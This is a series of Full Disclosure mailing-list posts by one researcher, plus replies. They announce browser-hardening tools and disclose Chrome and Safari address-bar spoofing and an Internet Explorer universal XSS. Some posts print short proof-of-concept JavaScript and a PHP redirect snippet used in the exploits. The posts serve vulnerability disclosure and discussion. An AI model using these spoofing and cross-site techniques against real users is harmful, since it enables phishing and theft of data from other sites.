[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)

2016-03-23 Thread David Leo 
To secure browser which is very fragile, the approach of HTTPS Only 3.1 is 
exceptionally simple:
1. Only HTTPS URLs(no other protocols)
2. Whitelist of domains(anything outside of whitelist is blocked)

Now, let's look at threats:
1. Man in the middle - it's fixed.
2. Phishing always requires the browser to load attacker's website, so it's 
permanently dead here.
3. Drive-by Download - dead(if applied strictly, unable to download the 
executable)
4. Clickjacking - dead(attacker's web page is unreachable)
5. Address Spoofing - dead too(just unable to load the fake content)
6. XSS - almost dead(for attacker, the XSS vulnerability has to be GET, because 
POST requires attacker's HTML)
7. CSRF - almost dead(for attacker, the CSRF vulnerability has to be GET, and 
modern web applications simply don't do important things in GET, because it can 
be bookmarked etc, too dangerous)

URLs:
Project Home Page: https://www.httpsonly.net/
View Source Code: https://www.httpsonly.net/source/

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)

2016-03-03 Thread David Leo 
When we browse the web, top threats are:
1. Remote code execution - everything is lost
2. Man in the middle - sniffing, and tampering
3. Phishing - simple, old, and still quite useful
4. Cross site scripting - data of the vulnerable domain is lost
5. CSRF - unauthorized action

So, what if the browser can only access HTTPS of whitelist domains? With HTTPS, 
"man in the middle" is fixed. And with the whitelist, other attacks become very 
difficult, some even become impossible(such as phishing). Phishing is a huge 
headache in this era, because URLs can be hidden in legitimate redirection(such 
as t.co).

That's why we made this simple tool(really simple - less than 200 lines of 
Python and JavaScript):
Project Home Page - https://www.httpsonly.net/
Source Code - https://github.com/httpsonly/httpsonly

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)

2016-02-16 Thread David Leo 
(@moderators The original post was too brief. This one has details.)

Summary

This tool completely locks browser - just HTTPS, nothing else. This
tool is extremely simple - less than 100 lines of code(Python and
JavaScript).

Why

Firefox Add-on Firesheep Brings Hacking to the Masses
http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html
"Firesheep is basically a packet sniffer that can analyze all the
unencrypted Web traffic"
(Quite a while ago, it's become a "casual game")

Yes, Mozilla said, "Gradually phasing out access to browser features
for non-secure websites", in April 2015. After more than six months,
they have done nothing useful.

The Chrome team wanted the same stuff:
https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
Again, nothing significant has been achieved yet.

And there is HTTPS Everywhere, with SO MANY rules:
https://www.eff.org/https-everywhere/atlas/
It's still able to access HTTP by default, but there is "Block all
HTTP requests". The problem: nothing happens when browser tries HTTP -
there should be warning(it's incorrect behavior) and options(try
HTTPS, Google Cache, etc). People complained, months ago:
https://github.com/EFForg/https-everywhere/issues/1329

How

PAC(Proxy auto-config) is used:
If it's HTTPS, that's fine.
If it's HTTP, user gets warning and options(try HTTPS, Google Cache -
it has HTTPS, etc).
Anything else, it goes to 0.0.0.0

It's a simple tool that does one job, and does it very well.

URLs

https://httpsonly.github.io/
https://github.com/httpsonly/httpsonly

Best Wishes,

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Open source tool for applying Google Chrome security updates

2015-08-12 Thread David Leo 

The Problem
If you are a network administrator, keeping browser updated is the first thing 
to do for security. Chrome is a very good browser, but it's a little bit 
complicated to answer this simple question: what is the version of the latest 
stable Chrome? And for people in places such as China(no Google services), 
updating Chrome is not an easy task.

The Solution
The official blog of Chrome Releases contains a lot of information. Code of 
this project extracts the version number from the official blog, downloads 
offline installers from the official website if it's a new version, and checks 
whether visitor's Chrome is exactly the same.

Security
The best part of this project - users do not need to download and run software 
to be checked. This project does not even contain JavaScript.

URLs
Source Code https://github.com/windowschrome
Home Page http://www.windowschrome.com/
Latest Stable Chrome http://www.windowschrome.com/data/version.txt


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Google Chrome Address Spoofing - Google's Opinion

2015-07-07 Thread David Leo 

It's public now:
https://code.google.com/p/chromium/issues/detail?id=497588

Interesting Points:

They did reproduce
I can reproduce this locally

They say it's DoS
seems like any renderer denial-of-service
(The browser does not crash!)

They say it's not security issue
remove security flags from this bug

Finally, they stopped replying
Jun 10 to Jul 2
(unbelievable huge delay)

In the end, they get it
Lots of phishing attacks these days tell you to call a phone number
No interactions

Currently, it's Severity-Medium.

Kind Regards,

PS
http://dieyu.org/
Updated!


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Google Chrome Address Spoofing (Request For Comment)

2015-06-30 Thread David Leo 

Impact:
The click to verify thing is completely broken...
Anyone can be BBB Accredited Business etc.
You can make whitehouse.gov display We love Islamic State :-)

Note:
No user interaction on the fake page.

Code:
* index.html
script
function next()
{
w.location.replace('http://www.oracle.com/index.html?'+n);n++;
setTimeout(next();,15);
setTimeout(next();,25);
}
function f()
{
w=window.open(content.html,_blank,width=500 height=500);

i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5);
}
/script
a href=# onclick=f()Go/abr
* content.html
bThis web page is NOT oracle.com/b
scriptlocation=http://www.oracle.com/index.html;;/script
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says June/16/2015 - it works as we tested today)

Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash(not DoS),
and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

Re: [FD] Safari Address Spoofing (How We Got It)

2015-06-02 Thread David Leo 

Great blog, Michal!

If you change http://1.2.3.4/; in your Safari code:
some URL in the real world(for example, dailymail.co.uk).
Your code won't work(page of target domain is simply loaded).

The trick here is: keep trying to load.

Kind Regards,

__
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

On 2015/5/31 23:09, Michal Zalewski wrote:

Well... 
http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

On Thu, May 28, 2015 at 10:47 PM, David Leo david@deusen.co.uk wrote:

Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.
How it works:
Just keep trying to load the web page of target domain.

How We Got It:
Safari changes address bar to new URL,
BEFORE new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Safari Address Spoofing (How We Got It)

2015-05-31 Thread David Leo 

Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.
How it works:
Just keep trying to load the web page of target domain.

How We Got It:
Safari changes address bar to new URL,
BEFORE new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Very Important Info About Major Internet Explorer Vulnerability - NOT Patched

2015-02-07 Thread David Leo 

1.
Spartan - vulnerable (Windows 10)
http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png
Thanks to Zaakiy Siddiqui!

2.
?php
sleep(2);
header(Location: http://www.dailymail.co.uk/robots.txt;);
?
Many asked for it.

3.
It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc
Not only injecting content - also getting private info etc.

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

2015-02-07 Thread David Leo 

'could you share the contents of 1.php?'
Sure:
?php
sleep(2);
header(Location: http://www.dailymail.co.uk/robots.txt;);
?

I'm assuming it is a delayed re-direct to the target's domain?
Exactly. :-)

the cloudflare scripts
It's been tested without them.

Kind Regards,

On 2015/2/6 2:31, Barkley, Peter wrote:

Thanks Zaakiy,

I'm able to get the hacked page on IE9 after changing the document mode from 
Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around 
having to manually switch the document mode with the appropriate DOCTYPE set in 
the exploit html page.

David, could you share the contents of 1.php? I'm assuming it is a delayed 
re-direct to the target's domain? I am unable to reproduce the exploit locally with the 
same code (assuming my 1.php is correct), though without the cloudflare scripts.

Thanks,
Peter


Peter Barkley | Senior Security Intelligence Analyst | Security Operations 
Centre | Royal Bank of Canada



-Original Message-
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of 
Zaakiy Siddiqui
Sent: 2015, February, 04 6:46 PM
To: David Leo; Joey Fowler
Cc: fulldisclosure@seclists.org; b...@securitytracker.com; 
bugt...@securityfocus.com; cve-ass...@mitre.org
Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Hi David,

Nice one…great find!  And thanks Joey for confirming the bypass of 
HTTP-to-HTTPS restrictions.

I can confirm that this also affects Spartan Browser (Experimental enabled in 
about:flags in Internet Explorer 11).

I can also confirm that IE 10 is affected.

IE 9 appears to not be vulnerable. Screenshots below.

Regards,
Zaakiy Siddiqui


IE 11 Spartan - vulnerable (Windows 10)

[cid:Image1466.png@14b56f08dd75bb]

[cid:Image1487.png@14b56f6487b5d0]


IE 10 - vulnerable (Windows 7)
[cid:Image1485.jpg@14b56f5f5025ce]

IE 9 - not vulnerable (Windows 7)

[cid:Image1503.jpg@14b56fa3c785e0]


From: David Leomailto:david@deusen.co.uk
Sent: ‎Wednesday‎, ‎4‎ ‎February‎ ‎2015 ‎11‎:‎13‎ ‎PM
To: Joey Fowlermailto:j...@tumblr.com
Cc: bugt...@securityfocus.commailto:bugt...@securityfocus.com, 
fulldisclosure@seclists.orgmailto:fulldisclosure@seclists.org, 
b...@securitytracker.commailto:b...@securitytracker.com, 
cve-ass...@mitre.orgmailto:cve-ass...@mitre.org

Microsoft was notified on Oct 13, 2014.

Joey thank you very much for your words.

Kind Regards,

On 2015/2/3 4:53, Joey Fowler wrote:

Hi David,

nice is an understatement here.

I've done some testing with this one and, while there /are/ quirks, it most 
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers (with 
`deny` or `same-origin` values), it executes successfully. Pending the payload 
being injected, most Content Security Policies are also bypassed (by injecting 
HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find!

Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr



On Sat, Jan 31, 2015 at 9:18 AM, David Leo david@deusen.co.uk 
mailto:david@deusen.co.uk wrote:

 Deusen just published code and description here:
 http://www.deusen.co.uk/items/__insider3show.3362009741042107/ 
http://www.deusen.co.uk/items/insider3show.3362009741042107/
 which demonstrates the serious security issue.

 Summary
 An Internet Explorer vulnerability is shown here:
 Content of dailymail.co.uk http://dailymail.co.uk can be changed by 
external domain.

 How To Use
 1. Close the popup window(confirm dialog) after three seconds.
 2. Click Go.
 3. After 7 seconds, Hacked by Deusen is actively injected into dailymail.co.uk 
http://dailymail.co.uk.

 Technical Details
 Vulnerability: Universal Cross Site Scripting(XSS)
 Impact: Same Origin Policy(SOP) is completely bypassed
 Attack: Attackers can steal anything from another domain, and inject 
anything into another domain
 Tested: Jan/29/2015 Internet Explorer 11 Windows 7

 If you like it, please reply nice.

 Kind Regards,


 _
 Sent through the Full Disclosure mailing list
 https://nmap.org/mailman/__listinfo/fulldisclosure 
https://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/__fulldisclosure/ 
http://seclists.org/fulldisclosure/



___
If you received this email in error, please advise the sender (by return email 
or otherwise) immediately. You have consented to receive the attached 
electronically at the above-noted email address; please retain a copy of this 
confirmation for future reference.

Si vous recevez ce courriel par erreur, veuillez en aviser l'expéditeur 
immédiatement, par retour de courriel ou par un autre moyen. Vous avez accepté 
de

[FD] Major Internet Explorer Vulnerability - NOT Patched

2015-01-31 Thread David Leo 

Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window(confirm dialog) after three seconds.
2. Click Go.
3. After 7 seconds, Hacked by Deusen is actively injected into 
dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything 
into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply nice.

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/